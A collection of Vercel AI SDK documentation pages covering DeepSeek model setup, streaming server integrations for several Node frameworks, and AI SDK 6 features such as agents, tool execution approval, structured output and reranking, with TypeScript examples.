While DeepSeek R1 models are powerful, they have certain limitations:

No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']

Get started with DeepSeek V3.2

With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek V3.2 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

DeepSeek V3.2

DeepSeek V3.2 is a frontier model that harmonizes high computational efficiency with superior reasoning and agent performance. It introduces several key technical breakthroughs that enable it to perform comparably to GPT-5 while remaining open-source.

The series includes two primary variants:

DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.

Benchmarks

DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:

Reasoning Capabilities

AIME 2025 (Pass@1): 96.0% (Speciale)
HMMT 2025 (Pass@1): 99.2% (Speciale)
HLE (Pass@1): 30.6%
Codeforces (Rating): 2701 (Speciale)

Agentic Capabilities

SWE Verified (Resolved): 73.1%
Terminal Bench 2.0 (Acc): 46.4%
τ2 Bench (Pass@1): 80.3%
Tool Decathlon (Pass@1): 35.2%

Source

Model Options

When using DeepSeek V3.2 with the AI SDK, you have two model options:

Model Alias	Model Version	Description
`deepseek-chat`	DeepSeek-V3.2 (Non-thinking Mode)	Standard chat model
`deepseek-reasoner`	DeepSeek-V3.2 (Thinking Mode)	Enhanced reasoning for complex problem-solving

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Explain the concept of sparse attention in transformers.',
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text' || part.type === 'reasoning') {
              return <div key={index}>{part.text}</div>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Enhance Your Agent with Tools

One of the key strengths of DeepSeek V3.2 is its agentic capabilities. You can extend your agent's functionality by adding tools that allow the model to perform specific actions or retrieve information.

Update Your Route Handler

Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:

import { deepseek } from '@ai-sdk/deepseek';
import {
  convertToModelMessages,
  stepCountIs,
  streamText,
  tool,
  UIMessage,
} from 'ai';
import { z } from 'zod';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: convertToModelMessages(messages),
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: async ({ location }) => ({
          location,
          temperature: 72,
          unit: 'fahrenheit',
        }),
      }),
    },
    stopWhen: stepCountIs(5),
  });

  return result.toUIMessageStreamResponse({ sendReasoning: true });
}

This adds a weather tool that the model can call when needed. The stopWhen: stepCountIs(5) parameter allows the agent to continue executing for multiple steps (up to 5), enabling it to use tools and reason iteratively before stopping. Learn more about loop control to customize when and how your agent stops execution.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Guides description: Learn how to build AI applications with the AI SDK

Guides

These use-case specific guides are intended to help you build real applications with the AI SDK.

title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']

Node.js HTTP Server

You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/node-http-server

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
}).listen(8080);

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  switch (req.url) {
    case '/stream-data': {
      const stream = createUIMessageStream({
        execute: ({ writer }) => {
          // write some custom data
          writer.write({ type: 'start' });

          writer.write({
            type: 'data-custom',
            data: {
              custom: 'Hello, world!',
            },
          });

          const result = streamText({
            model: 'openai/gpt-4o',
            prompt: 'Invent a new holiday and describe its traditions.',
          });

          writer.merge(
            result.toUIMessageStream({
              sendStart: false,
              onError: error => {
                // Error messages are masked by default for security reasons.
                // If you want to expose the error message to the client, you can do so here:
                return error instanceof Error ? error.message : String(error);
              },
            }),
          );
        },
      });

      pipeUIMessageStreamToResponse({ stream, response: res });

      break;
    }
  }
}).listen(8080);

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
}).listen(8080);

Troubleshooting

Streaming not working when proxied

title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']

Express

You can use the AI SDK in an Express server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/express

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeUIMessageStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Sending Custom Data

pipeUIMessageStreamToResponse can be used to send custom data to the client.

import {
  createUIMessageStream,
  pipeUIMessageStreamToResponse,
  streamText,
} from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/custom-data-parts', async (req: Request, res: Response) => {
  pipeUIMessageStreamToResponse({
    response: res,
    stream: createUIMessageStream({
      execute: async ({ writer }) => {
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });

        writer.merge(result.toUIMessageStream({ sendStart: false }));
      },
    }),
  });
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Troubleshooting

Streaming not working when proxied

title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']

Hono

You can use the AI SDK in a Hono server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/hono

UI Message Stream

You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });
  return result.toUIMessageStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Text Stream

You can use the toTextStreamResponse method to return a text stream response.

import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/text', async c => {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Write a short poem about coding.',
  });
  return result.toTextStreamResponse();
});

serve({ fetch: app.fetch, port: 8080 });

Sending Custom Data

You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.

import { serve } from '@hono/node-server';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
} from 'ai';
import { Hono } from 'hono';

const app = new Hono();

app.post('/stream-data', async c => {
  // immediately start streaming the response
  const stream = createUIMessageStream({
    execute: ({ writer }) => {
      writer.write({ type: 'start' });

      writer.write({
        type: 'data-custom',
        data: {
          custom: 'Hello, world!',
        },
      });

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      writer.merge(
        result.toUIMessageStream({
          sendStart: false,
          onError: error => {
            // Error messages are masked by default for security reasons.
            // If you want to expose the error message to the client, you can do so here:
            return error instanceof Error ? error.message : String(error);
          },
        }),
      );
    },
  });
  return createUIMessageStreamResponse({ stream });
});

serve({ fetch: app.fetch, port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']

Fastify

You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/fastify

Data Stream

You can use the toDataStream method to get a data stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  // Mark the response as a v1 data stream:
  reply.header('X-Vercel-AI-Data-Stream', 'v1');
  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.toDataStream({ data }));
});

fastify.listen({ port: 8080 });

Sending Custom Data

createDataStream can be used to send custom data to the client.

import { createDataStream, streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/stream-data', async function (request, reply) {
  // immediately start streaming the response
  const dataStream = createDataStream({
    execute: async dataStreamWriter => {
      dataStreamWriter.writeData('initialized call');

      const result = streamText({
        model: 'openai/gpt-4o',
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      result.mergeIntoDataStream(dataStreamWriter);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });

  // Mark the response as a v1 data stream:
  reply.header('X-Vercel-AI-Data-Stream', 'v1');
  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(dataStream);
});

fastify.listen({ port: 8080 });

Text Stream

You can use the textStream property to get a text stream from the result and then pipe it to the response.

import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: 'openai/gpt-4o',
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.textStream);
});

fastify.listen({ port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']

Nest.js

You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.

Examples

The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.

Full example: github.com/vercel/ai/examples/nest

UI Message Stream

You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/')
  async root(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeUIMessageStreamToResponse(res);
  }
}

Sending Custom Data

createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.

import { Controller, Post, Res } from '@nestjs/common';
import {
  createUIMessageStream,
  streamText,
  pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/stream-data')
  async streamData(@Res() response: Response) {
    const stream = createUIMessageStream({
      execute: ({ writer }) => {
        // write some data
        writer.write({ type: 'start' });

        writer.write({
          type: 'data-custom',
          data: {
            custom: 'Hello, world!',
          },
        });

        const result = streamText({
          model: 'openai/gpt-4o',
          prompt: 'Invent a new holiday and describe its traditions.',
        });
        writer.merge(
          result.toUIMessageStream({
            sendStart: false,
            onError: error => {
              // Error messages are masked by default for security reasons.
              // If you want to expose the error message to the client, you can do so here:
              return error instanceof Error ? error.message : String(error);
            },
          }),
        );
      },
    });
    pipeUIMessageStreamToResponse({ stream, response });
  }
}

Text Stream

You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.

import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post()
  async example(@Res() res: Response) {
    const result = streamText({
      model: 'openai/gpt-4o',
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeTextStreamToResponse(res);
  }
}

Troubleshooting

Streaming not working when proxied

title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

AI SDK

The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

Why use the AI SDK?

Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.

For example, here’s how you can generate text with various models using the AI SDK:

The AI SDK has two main libraries:

AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interface.

Model Providers

The AI SDK supports multiple model providers.

Templates

We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.

Starter Kits

Feature Exploration

Frameworks

Generative UI

Security

Join our Community

If you have questions about anything related to the AI SDK, you're always welcome to ask our community on the Vercel Community.

`llms.txt` (for Cursor, Windsurf, Copilot, Claude etc.)

Example Usage

For instance, to prompt an LLM with questions about the AI SDK:

Copy the documentation contents from ai-sdk.dev/llms.txt
Use the following prompt format:

Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}

title: AI SDK 6 Beta description: Get started with the Beta version of AI SDK 6.

Announcing AI SDK 6 Beta

Why AI SDK 6?

AI SDK 6 is a major version due to the introduction of the v3 Language Model Specification that powers new capabilities like agents and tool approval. However, unlike AI SDK 5, this release is not expected to have major breaking changes for most users.

The version bump reflects improvements to the specification, not a complete redesign of the SDK. If you're using AI SDK 5, migrating to v6 should be straightforward with minimal code changes.

Beta Version Guidance

The AI SDK 6 Beta is intended for:

Trying out new features and giving us feedback on the developer experience
Experimenting with agents and tool approval workflows

Your feedback during this beta phase directly shapes the final stable release. Share your experiences through GitHub issues.

Installation

To install the AI SDK 6 Beta, run the following command:

npm install ai@beta @ai-sdk/openai@beta @ai-sdk/react@beta

What's New in AI SDK 6?

AI SDK 6 introduces several features (with more to come soon!):

Agent Abstraction

A new unified interface for building agents with full control over execution flow, tool loops, and state management.

Tool Execution Approval

Request user confirmation before executing tools, enabling native human-in-the-loop patterns.

Structured Output (Stable)

Generate structured data alongside tool calling with generateText and streamText - now stable and production-ready.

Reranking Support

Improve search relevance by reordering documents based on their relationship to a query using specialized reranking models.

Image Editing Support

Native support for image editing (coming soon).

Agent Abstraction

AI SDK 6 introduces a powerful new Agent interface that provides a standardized way to build agents.

Default Implementation: ToolLoopAgent

The ToolLoopAgent class provides a default implementation out of the box:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { weatherTool } from '@/tool/weather';

export const weatherAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful weather assistant.',
  tools: {
    weather: weatherTool,
  },
});

// Use the agent
const result = await weatherAgent.generate({
  prompt: 'What is the weather in San Francisco?',
});

The agent automatically handles the tool execution loop:

Calls the LLM with your prompt
Executes any requested tool calls
Adds results back to the conversation
Repeats until complete (default stopWhen: stepCountIs(20))

Configuring Call Options

Call options let you pass type-safe runtime inputs to dynamically configure your agents. Use them to inject retrieved documents for RAG, select models based on request complexity, customize tool behavior per request, or adjust any agent setting based on context.

Without call options, you'd need to create multiple agents or handle configuration logic outside the agent. With call options, you define a schema once and modify agent behavior at runtime:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const supportAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userId: z.string(),
    accountType: z.enum(['free', 'pro', 'enterprise']),
  }),
  instructions: 'You are a helpful customer support agent.',
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    instructions:
      settings.instructions +
      `\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}

Adjust your response based on the user's account level.`,
  }),
});

// Pass options when calling the agent
const result = await supportAgent.generate({
  prompt: 'How do I upgrade my account?',
  options: {
    userId: 'user_123',
    accountType: 'free',
  },
});

The options parameter is type-safe and will error if you don't provide it or pass incorrect types.

Call options enable dynamic agent configuration for several scenarios:

RAG: Fetch relevant documents and inject them into prompts at runtime
Dynamic model selection: Choose faster or more capable models based on request complexity
Tool configuration: Adjust tools per request
Provider options: Set reasoning effort, temperature, or other provider-specific settings dynamically

Learn more in the Configuring Call Options documentation.

UI Integration

Agents integrate seamlessly with React and other UI frameworks:

// Server-side API route
import { createAgentUIStreamResponse } from 'ai';

export async function POST(request: Request) {
  const { messages } = await request.json();

  return createAgentUIStreamResponse({
    agent: weatherAgent,
    messages,
  });
}

// Client-side with type safety
import { useChat } from '@ai-sdk/react';
import { InferAgentUIMessage } from 'ai';
import { weatherAgent } from '@/agent/weather-agent';

type WeatherAgentUIMessage = InferAgentUIMessage<typeof weatherAgent>;

const { messages, sendMessage } = useChat<WeatherAgentUIMessage>();

Custom Agent Implementations

In AI SDK 6, Agent is an interface rather than a concrete class. While ToolLoopAgent provides a solid default implementation for most use cases, you can implement the Agent interface to build custom agent architectures:

import { Agent } from 'ai';

// Build your own multi-agent orchestrator that delegates to specialists
class Orchestrator implements Agent {
  constructor(private subAgents: Record<string, Agent>) {
    /* Implementation */
  }
}

const orchestrator = new Orchestrator({
  subAgents: {
    // your subagents
  },
});

This approach enables you to experiment with orchestrators, memory layers, custom stop conditions, and agent patterns tailored to your specific use case.

Tool Execution Approval

AI SDK 6 introduces a tool approval system that gives you control over when tools are executed.

Enable approval for a tool by setting needsApproval:

import { tool } from 'ai';
import { z } from 'zod';

export const weatherTool = tool({
  description: 'Get the weather in a location',
  inputSchema: z.object({
    city: z.string(),
  }),
  needsApproval: true, // Require user approval
  execute: async ({ city }) => {
    const weather = await fetchWeather(city);
    return weather;
  },
});

Dynamic Approval

Make approval decisions based on tool input:

export const paymentTool = tool({
  description: 'Process a payment',
  inputSchema: z.object({
    amount: z.number(),
    recipient: z.string(),
  }),
  // Only require approval for large transactions
  needsApproval: async ({ amount }) => amount > 1000,
  execute: async ({ amount, recipient }) => {
    return await processPayment(amount, recipient);
  },
});

Client-Side Approval UI

Handle approval requests in your UI:

export function WeatherToolView({ invocation, addToolApprovalResponse }) {
  if (invocation.state === 'approval-requested') {
    return (
      <div>
        <p>Can I retrieve the weather for {invocation.input.city}?</p>
        <button
          onClick={() =>
            addToolApprovalResponse({
              id: invocation.approval.id,
              approved: true,
            })
          }
        >
          Approve
        </button>
        <button
          onClick={() =>
            addToolApprovalResponse({
              id: invocation.approval.id,
              approved: false,
            })
          }
        >
          Deny
        </button>
      </div>
    );
  }

  if (invocation.state === 'output-available') {
    return (
      <div>
        Weather: {invocation.output.weather}
        Temperature: {invocation.output.temperature}°F
      </div>
    );
  }

  // Handle other states...
}

Auto-Submit After Approvals

Automatically continue the conversation once approvals are handled:

import { useChat } from '@ai-sdk/react';
import { lastAssistantMessageIsCompleteWithApprovalResponses } from 'ai';

const { messages, addToolApprovalResponse } = useChat({
  sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithApprovalResponses,
});

Structured Output (Stable)

AI SDK 6 stabilizes structured output support for agents, enabling you to generate structured data alongside multi-step tool calling.

Previously, you could only generate structured outputs with generateObject and streamObject, which didn't support tool calling. Now ToolLoopAgent (and generateText / streamText) can combine both capabilities using the output parameter:

import { Output, ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        city: z.string(),
      }),
      execute: async ({ city }) => {
        return { temperature: 72, condition: 'sunny' };
      },
    }),
  },
  output: Output.object({
    schema: z.object({
      summary: z.string(),
      temperature: z.number(),
      recommendation: z.string(),
    }),
  }),
});

const { output } = await agent.generate({
  prompt: 'What is the weather in San Francisco and what should I wear?',
});
// The agent calls the weather tool AND returns structured output
console.log(output);
// {
//   summary: "It's sunny in San Francisco",
//   temperature: 72,
//   recommendation: "Wear light clothing and sunglasses"
// }

Output Types

The Output object provides multiple strategies for structured generation:

Output.object(): Generate structured objects with Zod schemas
Output.array(): Generate arrays of structured objects
Output.choice(): Select from a specific set of options
Output.text(): Generate plain text (default behavior)

Streaming Structured Output

Use agent.stream() to stream structured output as it's being generated:

import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const profileAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'Generate realistic person profiles.',
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number(),
      occupation: z.string(),
    }),
  }),
});

const { partialOutputStream } = await profileAgent.stream({
  prompt: 'Generate a person profile.',
});

for await (const partial of partialOutputStream) {
  console.log(partial);
  // { name: "John" }
  // { name: "John", age: 30 }
  // { name: "John", age: 30, occupation: "Engineer" }
}

Support in `generateText` and `streamText`

Structured outputs are also supported in generateText and streamText functions, allowing you to use this feature outside of agents when needed.

Reranking Support

AI SDK 6 introduces native support for reranking, a technique that improves search relevance by reordering documents based on their relationship to a query.

Unlike embedding-based similarity search, reranking models are specifically trained to understand query-document relationships, producing more accurate relevance scores:

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Structured Document Reranking

Reranking also supports structured documents, making it ideal for searching through databases, emails, or other structured content:

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  {
    from: 'Paul Doe',
    subject: 'Follow-up',
    text: 'We are happy to give you a discount of 20% on your next order.',
  },
  {
    from: 'John McGill',
    subject: 'Missing Info',
    text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
  },
];

const { rerankedDocuments } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'Which pricing did we get from Oracle?',
  topN: 1,
});

console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }

Supported Providers

Several providers offer reranking models:

Image Editing Support

Native support for image editing and generation workflows is coming soon. This will enable:

Image-to-image transformations
Multi-modal editing with text prompts

Migration from AI SDK 5.x

AI SDK 6 is expected to have minimal breaking changes. The version bump is due to the v3 Language Model Specification, but most AI SDK 5 code will work with little or no modification.

Timeline

AI SDK 6 Beta: Available now

Stable Release: End of 2025

title: Agents description: Learn how to build agents with the AI SDK.

Agents

Agents are large language models (LLMs) that use tools in a loop to accomplish tasks.

These components work together:

LLMs process input and decide the next action
Tools extend capabilities beyond text generation (reading files, calling APIs, writing to databases)
Loop orchestrates execution through:
- Context management - Maintaining conversation history and deciding what the model sees (input) at each step
- Stopping conditions - Determining when the loop (task) is complete

Agent Class

The Agent class handles these three components. Here's an agent that uses multiple tools in a loop to accomplish a task:

import { Experimental_Agent as Agent, stepCountIs, tool } from 'ai';
import { z } from 'zod';

const weatherAgent = new Agent({
  model: __MODEL__,
  tools: {
    weather: tool({
      description: 'Get the weather in a location (in Fahrenheit)',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
    convertFahrenheitToCelsius: tool({
      description: 'Convert temperature from Fahrenheit to Celsius',
      inputSchema: z.object({
        temperature: z.number().describe('Temperature in Fahrenheit'),
      }),
      execute: async ({ temperature }) => {
        const celsius = Math.round((temperature - 32) * (5 / 9));
        return { celsius };
      },
    }),
  },
  stopWhen: stepCountIs(20),
});

const result = await weatherAgent.generate({
  prompt: 'What is the weather in San Francisco in celsius?',
});

console.log(result.text); // agent's final answer
console.log(result.steps); // steps taken by the agent

The agent automatically:

Calls the weather tool to get the temperature in Fahrenheit
Calls convertFahrenheitToCelsius to convert it
Generates a final text response with the result

The Agent class handles the loop, context management, and stopping conditions.

Why Use the Agent Class?

The Agent class is the recommended approach for building agents with the AI SDK because it:

Reduces boilerplate - Manages loops and message arrays
Improves reusability - Define once, use throughout your application
Simplifies maintenance - Single place to update agent configuration

For most use cases, start with the Agent class. Use core functions (generateText, streamText) when you need explicit control over each step for complex structured workflows.

Structured Workflows

Agents are flexible and powerful, but non-deterministic. When you need reliable, repeatable outcomes with explicit control flow, use core functions with structured workflow patterns combining:

Conditional statements for explicit branching
Standard functions for reusable logic
Error handling for robustness
Explicit control flow for predictability

Explore workflow patterns to learn more about building structured, reliable systems.

Next Steps

Building Agents - Guide to creating agents with the Agent class
Workflow Patterns - Structured patterns using core functions for complex workflows
Loop Control - Execution control with stopWhen and prepareStep

title: Building Agents description: Complete guide to creating agents with the Agent class.

Building Agents

The Agent class provides a structured way to encapsulate LLM configuration, tools, and behavior into reusable components. It handles the agent loop for you, allowing the LLM to call tools multiple times in sequence to accomplish complex tasks. Define agents once and use them across your application.

Why Use the Agent Class?

When building AI applications, you often need to:

Reuse configurations - Same model settings, tools, and prompts across different parts of your application
Maintain consistency - Ensure the same behavior and capabilities throughout your codebase
Simplify API routes - Reduce boilerplate in your endpoints
Type safety - Get full TypeScript support for your agent's tools and outputs

The Agent class provides a single place to define your agent's behavior.

Creating an Agent

Define an agent by instantiating the Agent class with your desired configuration:

import { Experimental_Agent as Agent } from 'ai';

const myAgent = new Agent({
  model: __MODEL__,
  system: 'You are a helpful assistant.',
  tools: {
    // Your tools here
  },
});

Configuration Options

The Agent class accepts all the same settings as generateText and streamText. Configure:

Model and System Prompt

import { Experimental_Agent as Agent } from 'ai';

const agent = new Agent({
  model: __MODEL__,
  system: 'You are an expert software engineer.',
});

Tools

Provide tools that the agent can use to accomplish tasks:

import { Experimental_Agent as Agent, tool } from 'ai';
import { z } from 'zod';

